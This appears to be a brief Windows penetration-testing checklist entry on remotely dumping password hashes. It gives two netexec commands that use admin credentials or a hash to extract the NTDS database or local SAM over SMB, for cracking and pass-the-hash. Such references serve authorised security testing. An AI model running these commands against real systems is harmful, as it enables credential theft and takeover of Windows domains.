Dump hashes remotely
windowschecklist
Walkthrough
Use netexec with admin credentials or a hash to dump the NTDS database or local SAM over SMB. A hit is the full set of domain or local password hashes for cracking and pass-the-hash.
Commands
bash
netexec smb <IP> -u <USER> -p '<PASS>' --ntds
bash
netexec smb <IP> -u <USER> -H <HASH> --sam